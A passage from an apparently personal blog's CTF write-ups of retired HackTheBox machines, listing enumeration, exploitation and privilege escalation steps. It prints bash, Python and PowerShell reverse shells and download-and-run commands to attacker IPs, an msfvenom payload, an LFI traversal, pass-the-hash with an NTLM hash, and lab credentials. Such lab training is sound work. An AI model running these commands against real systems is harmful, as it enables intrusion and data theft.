root priv. we can use this to create our rev shell for us to get into\nalso the *s at the end lets put them on a cron decoder thing nd see what it means\nhttps://crontab.guru/V\nso with this we can tell that the job is being run every minute\nnow lets visit this dir\nin the artisan folder lets put this php rev shell code\nhttps://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php\nchange accordingly\nthere we go , we have our shell now time to grab our root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/cronos/","section":"CTF Writeups","summary":"","title":"Cronos","type":"ctf-writeups"},{"content":" Devel # Overview # OS: Windows IP: 10.10.10.5 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Uploaded reverse shell.aspx on ftp and exploited with metasploit+msfvenom + w/o metapsloit ( local exploit sugg. setup inc ).\nEnumeration # nmap scan results\nhomepage\nExploitation w Metasploit + Msfvenom lets begin with accessing the ftp server as an anon\nlets check out the directory\nalright we will now try uploading a file here with the extension ,aspx as its microsoft iis version 7.5\ncreating a reverse tcp shell script with msf venom and then we upload it on the ftp server\nnow lets use metasploit to open a meterpreter session\nand we are in , lets enumerate now\nUsing the local exploit suggester\nwe just have to provide the exploit which session we want to run it on, after backgrounding the session\nThis returns us a list of exploits that we can run on the system\nwe will be using this client copy image one\nnice we have our shell , now lets grab our flags\nroot flag\nuser flag\nExploitation w/o Metasploit Setting up local exploit\nwget [https://bootstrap.pypa.io/pip/2.7/get-pip.p](https://bootstrap.pypa.io/pip/2.7/get-pip.p)y\npython2 -m pip install --user xlrd==1.1.0\npython2 [windows-exploit-suggester.py](http://windows-exploit-suggester.py/) --update\nwindows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt\nfollowed by gedit system.txt\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/devel/","section":"CTF Writeups","summary":"","title":"Devel","type":"ctf-writeups"},{"content":"","date":"28 July 2024","externalUrl":null,"permalink":"/tags/insane/","section":"Tags","summary":"","title":"Insane","type":"tags"},{"content":" Nibbles # Overview # OS: Linux IP: 10.10.10.75 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # php reverse shell injection.\nEnumeration # nmap scan results\nhome page\nsource code\nnibbleblog directory\ndirbusting results\non visiting the content page , we are greeted with this\nlets check out the users file\nit seems like admin is the username\nwe were able to login to the admin page by guessing the password as nibbles haha\nVulnerabilities # nibbleblog v4.0.3\nfile injection multi/http/nibble_file_upload\nExploitation without metasploit on reading the exploit for nibbles that we found earlier , we can infer that it is trying to upload a php exploit through the image plugin\nlets try this\nthis is our reverse shell script , we will be uploading this through the image plugin\nafter uploading the file we visit\nhttp://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php?cmd=id\non visiting we get our reverse shell\nspawning bash\nupgrading our shell\non running sudo -l , we figure out that the user that we have can run a script with root privileges\nlets go to this path\nlets add our revershell in this script\nand there we go , we have a root shell now time to grab the flags\nour root flag\nour user flag\nExploitation with metasploit lets use the payload we found\nnow lets try accessing root\nwe will try upgrading our shell\nok great so this system has python3 lets spawn in our shell\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/nibbles/","section":"CTF Writeups","summary":"","title":"Nibbles","type":"ctf-writeups"},{"content":" Optimum # Overview # OS: Windows IP: 10.10.10.8 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # pwned the box with a exploit , used simple http server mainly to host the files for download and done w metasploit.\nEnumeration # Nmap scan results\nhomepage\nVulnerabilities # https://www.exploit-db.com/exploits/39161\nExploitation w/o Metasploit lets first get our exploit file\nnow lets check the script nd change our ip to our local one\nit says we need to be hosting a webserver with netcat , so lets do that\nnow lets store our netcat here aswell to use alongwith the exploit\nwe make these files available via our simple httpserver\nsetting up our netcat acco. to the port we mentioned earlier\nnow on running this 2 or 3 times\npython 39161.py 10.10.10.8 80\nwe are able to get our shell\nwe got our user flag\nwe might need to do some privilege escalation for the root flag\nlets check the systems info.\nHost Name: OPTIMUM OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization:\nProduct ID: 00252-70000-00000-AA535 Original Install Date: 18/3/2017, 1:51:36 �� System Boot Time: 9/8/2024, 3:17:56 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020 Windows Directory: C:\\Windows System Directory: C:\\Windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest Total Physical Memory: 4.095 MB Available Physical Memory: 3.527 MB Virtual Memory: Max Size: 5.503 MB Virtual Memory: Available: 4.971 MB Virtual Memory: In Use: 532 MB Page File Location(s): C:\\pagefile.sys Domain: HTB Logon Server: \\OPTIMUM Hotfix(s): 31 Hotfix(s) Installed. [01]: KB2959936 [02]: KB2896496 [03]: KB2919355 [04]: KB2920189 [05]: KB2928120 [06]: KB2931358 [07]: KB2931366 [08]: KB2933826 [09]: KB2938772 [10]: KB2949621 [11]: KB2954879 [12]: KB2958262 [13]: KB2958263 [14]: KB2961072 [15]: KB2965500 [16]: KB2966407 [17]: KB2967917 [18]: KB2971203 [19]: KB2971850 [20]: KB2973351 [21]: KB2973448 [22]: KB2975061 [23]: KB2976627 [24]: KB2977629 [25]: KB2981580 [26]: KB2987107 [27]: KB2989647 [28]: KB2998527 [29]: KB3000850 [30]: KB3003057 [31]: KB3014442 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.8 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.\nrunning the local windows exploit suggester\nwe will use this one\nnow lets host it and download it on to our victims machine\ngetting the root flag\nExploitation w Metasploit and we are in\nwe got our user flag\ntime to do some privilege escalation for the root flag\nwe will first run the local exploit suggester\naand now we have a bunch of exploits to choose from , lets go with the last one\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/optimum/","section":"CTF Writeups","summary":"","title":"Optimum","type":"ctf-writeups"},{"content":" Sense # Overview # OS: OpenBSD IP: 10.10.10.60 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Started box sense , used a vulnerability on the pfsense router to allow code injection with burpsuite, got a stable reverse shell with a python script and got the flags and learnt how to workaround bad characters in query.\nEnumeration # nmap scan results\ndirbusting results\nhomepage\nvisiting system users page\nVulnerabilities # pfsense exploit\nhttps://www.exploit-db.com/exploits/43560\nExploitation # ok now lets go to the homepage\nwith the information we gathered we know that the username is Rohit and the password is the default pass for a pfsense router which is ‘pfsense’.\nand we are greeted with this page, now lets check if there are any exploits and see how to execute if there is one present\nso on exploit db we found this command injection exploit\nok so this tells us that it is checking if the database is queues nd then it url encodes the payload followed with pipelining to a shell.\nlets try this approach by modifying the requests with burpsuite\nwe pipeline our command injection to show on our shell that is listening using nc\non sending ls and whoami\nlets now make it so that it stores the output in a file\nwe dont get anything when we search for / lets see if the command is correct by checking with some other character.\nok so the command is fine , its just the character that is bad , lets check our environment variables.\nok nice , we see that the HOME variable points to / , we can make use of this\nby modifying our request like this\nwe are able to get a list of files\nwe have identified where our flags are located , all that is left is to actually retrieve them now\nlets modify the request for this again\nok so we cant just use cat like that apparently ,\nlets try getting a shell instead by executing a python script for opening a reverse shell\nwe will use this one from the reverse shell cheat sheet\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\u0026quot;10.0.0.1\u0026quot;,1234))\nnow lets run this file\nand there we go , we have our shell now we can grab our flags\npwned\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/sense/","section":"CTF Writeups","summary":"","title":"Sense","type":"ctf-writeups"},{"content":" Silo # Overview # OS: Windows IP: 10.10.10.82 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # odat , volatility , nishang shell ,nmap script for ssid bruteforce.\nhttps://www.notion.so\nEnumeration # nmap scan results\nVulnerabilities # Exploitation # lets download ODAT\nhttps://github.com/quentinhardy/odat\nso what im gonna do is clone this rep with git clone and try to directly run the odat.py file\nlets do this to fix it\npip3 uninstall crypto pip3 uninstall pycrypto pip3 install pycryptodome and it works now\nlets guess the sid first with this command\n└─$ python3 odat.py sidguesser -s 10.10.10.82 -p 1521\nok so when i used odat i was getting a bunch of false positives i dont know why\nlets try using a nmap script\nwe got our SID as XE\nok so when we check the options for password guesser we see that accounts.txt is being used to grab default creds.\nthe content seems to be all lowercase , oracle is case sensitive now so we will have to use a updated wordlist , lets use the one which metasploit uses\nwe will have tof format this list a bit because when we compare it to the prev one we see that the user and pass are separated by a / which here is not the case.\nthis fixes it for us, now we can try guessing the password\nok nice we got our valid creds which is scott/tiger\nnow lets use these creds\nsqlplus64 scott/tiger@10.10.10.82:1521/XE\nlets check our users privilege\nok so we seem to have only connect nd resource privs\nusing odat we can escalate our priv with the —sysdba flag and then make use of the file —putFile flag to upload a revshell.aspx, as iis usually supports aspx\nthen we will visit the directory with our rev shell nd get our shell\n└─$ python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U \u0026ldquo;scott\u0026rdquo; -P \u0026ldquo;tiger\u0026rdquo; -d XE \u0026ndash;putFile C:\\inetpub\\wwwroot muq.aspx muq.aspx \u0026ndash;sysdba\nnow lets visit the page\nlets get our rev shell from here\nlets get our nishang shell from here\nhttps://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1\nadd this line to call it from the bott. of the file\ntail -1 Invoke-PowerShellTcp.ps1\nnow lets use the webshell to provoke it\ntyping this in the webshell, gives us our shell\npowershell IEX(New-Object Net.WebClient).downloadString(\u0026rsquo;http://10.10.14.31:8000/nish.ps1')\nand boom we have our user flag\nnow lets try for the root flag\nthere was one more file which was some issue.txt , lets check that out\nok so this password did not work at all , there is a ? at the start of the password maybe we are not viewing it properly.\nlets try the same command on our webshell\nyep the character is diff , lets try this now\nalr so we got a memory dump\nlets get our os version first for our profile\nsysteminfo | findstr /B /C:\u0026ldquo;OS Name\u0026rdquo; /C:\u0026ldquo;OS Version\u0026rdquo;\nhttps://github.com/volatilityfoundation/volatility3.git\nthen we clone volatility from there\npython3 vol.py -f ~/Downloads/SILO-20180105-221806.dmp windows.info\nwe are not getting proper info from this version of volatility or maybe i am using it wrong\nlets try with volatility 2\ngit clone https://github.com/volatilityfoundation/volatility.git cd volatility python2 setup.py install now lets run volatility 2 with\npython2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp imageinfo\ni kept getting a bunch of import errors , i solved that by running these\nsudo apt-get install python2.7-dev\npip2 install pycryptodome\npip2 install distorm3\nrunning\npython2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp imageinfo\ngives us\nSuggested Profile(s) : Win2016x64_14393, Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_10240_17770, Win10x64_18362, Win10x64_14393, Win10x64, Win2012R2x64_18340, Win10x64_16299, Win2012R2x64, Win10x64_19041, Win2012x64, Win10x64_17763, Win8SP1x64_18340, Win10x64_10586, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063) AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS) AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS) AS Layer3 : FileAddressSpace (/home/kali/Downloads/SILO-20180105-221806.dmp) PAE type : No PAE DTB : 0x1a7000L KDBG : 0xf80078520a30L Number of Processors : 2 Image Type (Service Pack) : 0 KPCR for CPU 0 : 0xfffff8007857b000L KPCR for CPU 1 : 0xffffd000207e8000L KUSER_SHARED_DATA : 0xfffff78000000000L Image date and time : 2018-01-05 22:18:07 UTC+0000 Image local date and time : 2018-01-05 22:18:07 +0000\nwe will use the WIN2012 profile\nlets run this now and check our ps tree\npython2 vol.py -f ~/Downloads/SILO-20180105-221806.dmp \u0026ndash;profile Win2012R2x64 pstree\nhashdump returns us this\npth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd\nthis gives us our shell, with which we can easily get the root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/silo/","section":"CTF Writeups","summary":"","title":"Silo","type":"ctf-writeups"},{"content":" Solidstate # Overview # OS: Linux IP: 10.10.10.51 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # accessed james server , got ssh login details , logged in as mindy on ssh, escaped rbash shell by using a james server exploit which gave us a bash shell , enumerated using linpeas , further enumerated with linEnum , checked processes with pspy found a cron job running a root file nd used that to get a rev shell.\nEnumeration # nmap scan results\ndirbuster result\nhttp://10.10.10.51:80 # Directories found during testing:\nDirs found with a 200 response:\n/ /images/ /assets/ /assets/css/ /assets/fonts/ /assets/js/ /assets/sass/ /assets/css/images/ /assets/sass/base/ /assets/js/ie/ /assets/sass/components/ /assets/sass/layout/ /assets/sass/libs/\nDirs found with a 403 response:\n/icons/ /icons/small/ /server-status/\nFiles found during testing:\nFiles found with a 200 responce:\n/index.html /services.html /about.html /assets/js/skel.min.js /assets/js/jquery.min.js /assets/js/jquery.scrollex.min.js /assets/js/util.js /assets/fonts/FontAwesome.otf /assets/css/font-awesome.min.css /assets/js/main.js /assets/css/images/close.svg /assets/css/ie8.css /assets/fonts/fontawesome-webfont.eot /assets/css/ie9.css /assets/sass/base/_page.scss /assets/js/ie/PIE.htc /assets/sass/ie8.scss /assets/sass/base/_typography.scss /assets/js/ie/backgroundsize.min.htc /assets/css/main.css /assets/sass/ie9.scss /assets/sass/components/_box.scss /assets/js/ie/html5shiv.js /assets/fonts/fontawesome-webfont.svg /assets/fonts/fontawesome-webfont.ttf /assets/sass/components/_button.scss /assets/js/ie/respond.min.js /assets/sass/components/_features.scss /assets/fonts/fontawesome-webfont.woff /assets/sass/components/_form.scss /assets/sass/main.scss /assets/sass/components/_icon.scss /assets/fonts/fontawesome-webfont.woff2 /assets/sass/components/_image.scss /assets/sass/components/_list.scss /assets/sass/components/_section.scss /assets/sass/components/_table.scss /assets/sass/libs/_functions.scss /assets/sass/layout/_banner.scss /assets/sass/libs/_mixins.scss /assets/sass/layout/_footer.scss /assets/sass/libs/_skel.scss /assets/sass/libs/_vars.scss /assets/sass/layout/_header.scss /assets/sass/layout/_menu.scss /assets/sass/layout/_wrapper.scss\nnothing interesting here\nVulnerabilities # Exploitation # James Mail Server is listening on four ports with different functions. Simple Mail Transfer Protocol (SMTP) on TCP 25, Post Office Protocol (POP3) on TCP 110, and Network News Transfer Protocol (NNTP) on TCP 119 are all services that this box is offering. I could look at potentially brute forcing valid user names or sending phishing emails, but first I want to look at port 4555.\nTCP port 4555 is interesting because it is the James administration port. Even without an exploit, if I can access this service, I can likely get into things that might be useful. - 0xdf\nso lets visit port 4555 first\nwe are able to access using default root root creds\nso we have these users , lets change the pass for them and then access nd check out their mails\njames content\nthomas has nothing\njohn content\nok so mindy seems to have some temporary pass nd her access is restricted.\nlets check mindys mail\nok so mindy has 2 mails\nlets check them out\nok so we have our ssh creds now which is mindy:P@55W0rd1!2@\nmailadmin does not have any which is ironic\nright off we have our user flag\nok so apparently our bash is restricted to a rbash, so we have very limited commands\nlets try getting out of here first\nrunning cat/etc/passwd also shows us what shell mindy has access to\nwe can use the -t switch nd specify bash and it would log us in with the bash shell instead of the intended rbash.\nsshpass -p \u0026lsquo;P@55W0rd1!2@\u0026rsquo; ssh mindy@10.10.10.51 -t bash\nbut i dont think this is the intended way of getting a bash shell in this box.\nlets try using a exploit instead\nwe will use the 4th option\nlets use this payload\nbash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.35/8080 0\u0026gt;\u0026amp;1 annnd we have our shell\nlets try accessing admin w this now\nwe will still have to do some privesc , lets get linpeas on this and start enuming for some vectors\nwe set up the server in the dir containing linpeas.sh with\npython3 -m http.server\nand then we use this command on the victims machine to grab it\nwget http://10.10.14.35:8000/linpeas.sh\nnow lets run it ( run it immediately , i noticed that files put in the tmp dir. are being removed periodically )\nok so there seems to be a corn job running under root , im not getting info on what is being run actually\nlets run a more thorough scan with linenum\nhttps://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh\nthis file is pretty interesting , it has root permissions but is writeable to the user\nlets check out the processes as well with pspy\nhttps://github.com/DominicBreuker/pspy\nThe Linux version 4.9.0-3-686-pae indicates that this is a 32-bit kernel. The \u0026ldquo;686\u0026rdquo; refers to the 32-bit architecture, and \u0026ldquo;PAE\u0026rdquo; (Physical Address Extension) allows the system to address more than 4 GB of RAM on a 32-bit system. So, this is a 32-bit version of Debian.\nso lets use the 32 bit version of pspy\nok so this process seems to be running every 3mins and we know its being run with root privs.\nlets check this file out\nok so this was the file responsible for cleaning up tmp every 3 mins , lets change it so that we get a rev shell instead.\nlets upgrade our shell a bit first\nnow lets edit the tmp.py file\nand in 3 minutes we should have our shell\ngrabbing root flag\n","date":"28 July 2024","externalUrl":null,"permalink":"/ctf-writeups/solidstate/","section":"CTF Writeups","summary":"","title":"Solidstate","type":"ctf-writeups"},{"content":" Granny # Overview # OS: Windows IP: 10.10.10.15 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Did w/o metasploit , learnt how to use dataset how to upload files to server using curl , looked at system info found a suitable local exploit, also learnt how to send files from host to write on targets disk ,and then used churasso to escalate privilege and open another remote shell.\nEnumeration # nmap scan result\nchecking for supported http methods\nwhat is webdav?\nWeb Distributed Authoring and Versioning (WebDAV) is an HTTP extension designed to allow people to create and modify web sites using HTTP. It was originally started in 1996\nnow, on checking the response header we notice that it is being powered by asp.net\nwhich tells us that we will be able to execute aspx files on the server\ndirbustin results\nnothing useful found\nperforming a davtest to check what files can be uploaded\nVulnerabilities # Reverse shell through http methods workaround\nExploitation # ok so we can use the method move , we know that move allows us to rename the file as well , so lets try to put a file then move it rename it to .asp extension and see if that allows us to upload asp files.\ncURL, which stands for client URL, is a command line tool that developers use to transfer data to and from a server. At the most fundamental, cURL lets you talk to a server by specifying the location (in the form of a URL) and the data you want to send.\nBy default, curl uses the GET method, but you can use -X to change it to other methods like POST, PUT, DELETE, etc.\nperfect , now lets try renaming it\nmsfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.7 LPORT=1234 -o shell.aspx\nwe use this for making a reverse shell payload which we will upload to the server as a textfile then we will rename that textfile to .asp\nrenaming to aspx\non curling\nwe are greeted with this error , lets figure out why\non checking the contents of the txt file we notice that its all cluttered and none of the formatting is being saved, lets preserve all that with a simple binary command\nnow lets visit the site\ngreat so all the formatting is preserved now\nand we are in\nunfortunately our privilege is still low , lets try escalating it\nlets look at our systems info\nlets look for a exploit\nnow lets look for a writeable directory on the victims machine\nlets try getting our churrasco.exe file here\nlets get our netcat listener here aswell\nsetting up another listener\nnow lets run the nc listener using churasso\nand boom we have access now lets grab our files\nuser flag\nroot flag\n","date":"22 July 2024","externalUrl":null,"permalink":"/ctf-writeups/granny/","section":"CTF Writeups","summary":"","title":"Granny","type":"ctf-writeups"},{"content":" Jerry # Overview # OS: Windows IP: 10.10.10.95 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # not able to load up the homepage or connect to the machine for some reason leaving this for later.\nEnumeration # nmap scan results\nHomepage\nVulnerabilities # Exploitation # ","date":"22 July 2024","externalUrl":null,"permalink":"/ctf-writeups/jerry/","section":"CTF Writeups","summary":"","title":"Jerry","type":"ctf-writeups"},{"content":" Nineveh # Overview # OS: Linux IP: 10.10.10.43 Difficulty: Medium Platform: HackTheBox OSCP: No Lists: N/A Summary # intended user path via portknocking left, http://linenum.sh , chrootkit vuln, cron job , process script, burp, binwalk.\nLoot # notes parameter Error Message ninevehNotes.txt No error, displays note /etc/passwd No Note is selected. ../../../../../../../../../../etc/passwd No Note is selected. ninevehNotes Warning: include(files/ninevehNotes): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31 ninevehNote No Note is selected. files/ninevehNotes/../../../../../../../../../etc/passwd File name too long. files/ninevehNotes/../../../../../../../etc/passwd The contents of /etc/passwd /ninevehNotes/../etc/passwd The contents of /etc/passwd Enumeration # nmap scan results\nsupported http methods\ndirbusting results for http\ndirbusting results for https\nwe have to specify -k flag\nlets visit this page\nVulnerabilities # phpLiteAdmin v 1.9 vuln\nExploitation # lets try bruteforcing the php lite admin login page with hydra and see if it works out\nalright so we got password 123 as the pass, now lets try accessing and see whats up\nwe are greeted with this page where we can infer that there is a database named test with no tables\nwe will be using this php injection exploit\nnow lets try to get into this page from earlier\nusing burp it shows the post form as this\nnow assuming that the password check is hardcoded to be just a simple strcmp between two fields.\nwe know that if we do strcmp between two equal strings it returns 0 which means its equal. suppose we give a invalid type as one of the fields, then in this case itll return null which is comparable to 0. lets try this approach by modifying the post data\nand boom we in\non visiting the notes page we are greeted with this , if we look carefully we can see that the file is being mentioned in the url, lets check for lfi.\nwith this we can infer that as long as nineveh notes is there in the parameter we can access anyhing , lets try to access the shell we created before\nand we are greeted with this\nnow lets check for cmd exec with ls\ncool so we can execute commands, lets try getting a reverse shell with burpsuite now\nwith this url encoded reverse shell code\nnice , we have access as www-data , now lets escalate our privileges\nPrivilege escalation upgrading our shell\nlets get our linenum.sh on a http server and make it available for this machine\nok so we can access amrois folder but we cant view the flag, lets look around more\nhm amrois has access to only this folder\nok so we notice that the reports are being made every minute , there may be a cron job behind this\nlets try creating our own script\n#!/bin/bash #loop by line IFS=$\u0026#39;\\n\u0026#39; old_process=$(ps -eo command) while true; do new_process=$(ps -eo command) diff \u0026lt;(echo \u0026#34;$old_process\u0026#34;) \u0026lt;(echo \u0026#34;$new_process\u0026#34;) |grep [\\\u0026lt;\\\u0026gt;] sleep 1 old_process=$new_process done now we do chmod +x/procmon.sh followed by ./procmon.sh to run the script\nok so we can see that these are the cron jobs that are running every minute\nit seems to be executing the path /usr/bin/chkrootkit\nchkrootkit vulnerabilities\nlets use this\nand there we go , we got our shell with root privilege\nlets grab our flags\nroot flag\nuser flag\nIntended route for user ok so remember the secure notes page which showed a image file? lets check that out\non downloading the image and performing a binwalk we get these files that were hidden along with it\nlets check these files out now\nnow lets check those files we got if there is anything interesting\nand there we go we got a key nd something else\n","date":"22 July 2024","externalUrl":null,"permalink":"/ctf-writeups/nineveh/","section":"CTF Writeups","summary":"","title":"Nineveh","type":"ctf-writeups"},{"content":" Grandpa # Overview # OS: Windows IP: 10.10.10.14 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # learnt to use the local exploit suggester.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nhomepage\nVulnerabilities # Port 80/tcp\nhttps://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl/\nExploitation # with metasploit using the vulnerability we found earlier , we have gotten access pretty easily now lets look around\nAlright , so we are not able to access either harry or administrator possibly because our users privilege is low.\non trying to get the system information we encounter this\nlets list out the processes\ntime to migrate into one of the nt authority services\nnow lets run a local exploit suggester and look for exploits for this system.\nlets go with the client_copy_image\nand there we go, we have escalated our privilege\nroot flag\nuser flag\npwned\n","date":"19 July 2024","externalUrl":null,"permalink":"/ctf-writeups/grandpa/","section":"CTF Writeups","summary":"","title":"Grandpa","type":"ctf-writeups"},{"content":" Beep # Overview # OS: Linux IP: 10.10.10.7 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Learnt how to use local file intrusion exploit for directory traversal.\nEnumeration # nmap scan results\nNot able to access the page?\nlets change our min tls setting in about:config\nnow we can view the homepage\nVulnerabilities # Elastix local file inclusion vulnerability\nhttps://www.exploit-db.com/exploits/37637\nWhat is LFI ? # An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS). Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.\nLocal File Inclusion is very similar to Remote File Inclusion (RFI). However, an attacker using LFI may only include local files (not remote files like in the case of RFI).\nDirectory Traversal # Even without the ability to upload and execute code, a Local File Inclusion vulnerability can be dangerous. An attacker can still perform a Directory Traversal / Path Traversal attack using an LFI vulnerability as follows.\nhttp://example.com/?file=../../../../etc/passwd In the above example, an attacker can get the contents of the /etc/passwd file that contains a list of users on the server. Similarly, an attacker may leverage the Directory Traversal vulnerability to access log files (for example, Apache access.log or error.log), source code, and other sensitive information. This information may then be used to advance an attack.\nExploitation # Lets use the LFI vulnerability we found earlier to perform our directory traversal\ndamn it works , now lets check if we can find anything useful from this page\nlets try using these credentials to access the machine via ssh\nand there we go , we got access now lets look for the flags\nroot flag\nuser flag\npwned\n","date":"18 July 2024","externalUrl":null,"permalink":"/ctf-writeups/beep/","section":"CTF Writeups","summary":"","title":"Beep","type":"ctf-writeups"},{"content":" Bashed # Overview # OS: Linux IP: 10.10.10.68 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # Learnt how to open a revershell with python and privilege escalation.\nEnumeration # nmap scan results\nHomepage\ndir-busting results\npossible exploit\nVulnerabilities # Possible reverse shell execution at\n10.10.10.68/dev/phpbash.php shell\nExploitation # By accessing the directory we found earlier and executing some shell commands we have gotten ourselves the user flag\nthis tells us that the user scriptmanager can execute any command\nso lets try to spawn a shell as scriptmanager\ndoes not seem to work , probably because the shell we are using does not allow it?\nlets try to open a reverse shell\nwe start off by setting up a listener on our kali machine using netcat\nnow lets identify if the target has python using python —version command\ngreat so the target has python!\nnow lets run our reverse shell command\nand there we go , we have our reverse shell set up , now lets try the earlier command to switch the user to scriptmanager\nstill cant access root\non looking further we notice that scriptmanager has access to this scripts directory , lets check it out\ndamn, so there is a py file that is being executed which creates a text file with the following text\nfurthermore , we notice that the text file that is being created is owned by root ? lets try making it so that our reverse shell code is executed.\nhere we write our reverse shell code into exploit.py then we get rid of the test.py that was already there and rename our code to test.py, this should execute the exploit and give us a reverseshell connection with root privilege on port 1235.\nand there we go , we have root access , time to grab the flag from the root folder\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/bashed/","section":"CTF Writeups","summary":"","title":"Bashed","type":"ctf-writeups"},{"content":" Blue # Overview # OS: Windows IP: 10.10.10.40 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # smb 2.1.0 vulnerability / Eternal Blue.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nVulnerabilities # port 445 / tcp\nsmb 2.1.0 windows 7\nhttps://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/\nExploitation # using the smb 2.1.0 vulnerability eternal blue that we found earlier\nwe got in , now time to grab our flags\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/blue/","section":"CTF Writeups","summary":"","title":"Blue","type":"ctf-writeups"},{"content":" Lame # Overview # OS: Linux IP: 10.10.10.3 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # vsftpd-234 backdoor exploit.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nVulnerabilities # PORT 21/tcp\nvsftpd 2.3.4 backdoor\nhttps://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/\nPORT 445/tcp\nsamba smbd 3.0.20-Debian\nCVE-2007-2447 25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the \u0026ldquo;username map script\u0026rdquo; smb.\nExploitation # Using metasploit to execute the backdoor attack\nSo apparently , the backdoor exploit does not work we will now try to another vulnerability that we had found\nthe samba exploit works , now time to grab our flags\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/lame/","section":"CTF Writeups","summary":"","title":"Lame","type":"ctf-writeups"},{"content":" Legacyq # Overview # OS: Windows IP: 10.10.10.4 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # smb vulnerability.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nChecking for existing smb vulnerabilities\nVulnerabilities # I validated this step using the evidence below before moving forward in the chain.\nPORT 445/tcp\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\ngained access to the shell, now lets look for the flags\nroot flag\nuser flag\nPwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/legacyq/","section":"CTF Writeups","summary":"","title":"Legacyq","type":"ctf-writeups"},{"content":" Shocker # Overview # OS: Linux IP: 10.10.10.56 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # cgi-bin/user.sh shellshock exploit + perl.\nEnumeration # I started broad, validated each finding, and then focused only on paths that were reproducible.\nnmap scan results\nDirectory busting results\n/\n/cgi-bin/ → user.sh\n/icons/\n/icons/small/\nCould possibly run a script here?\nVulnerabilities # PORT 40/TCP\nlogrotate\nhttps://www.exploit-db.com/exploits/46676\nPORT 2222/TCP\nusername enumeration\nhttps://www.exploit-db.com/exploits/40136\nDRIECTORY\n/cgi-bin/user.sh\nShellshock\nExploitation # Exploiting using the shellshock vulnerability\nNow lets grab our flags, starting with the user flag\nnot able to access root directory , probably because we have a lower privilege\nPrivilege escalation\nand here we have the root flag as well\npwned\n","date":"17 July 2024","externalUrl":null,"permalink":"/ctf-writeups/shocker/","section":"CTF Writeups","summary":"","title":"Shocker","type":"ctf-writeups"},{"content":" 1. Enumeration # Metadata # exiftool # exiftool file Local Enumeration Scripts # Grabbing usernames # grep sh$ /etc/passwd Finding SUID binaries # find / -perm -4000 -type f 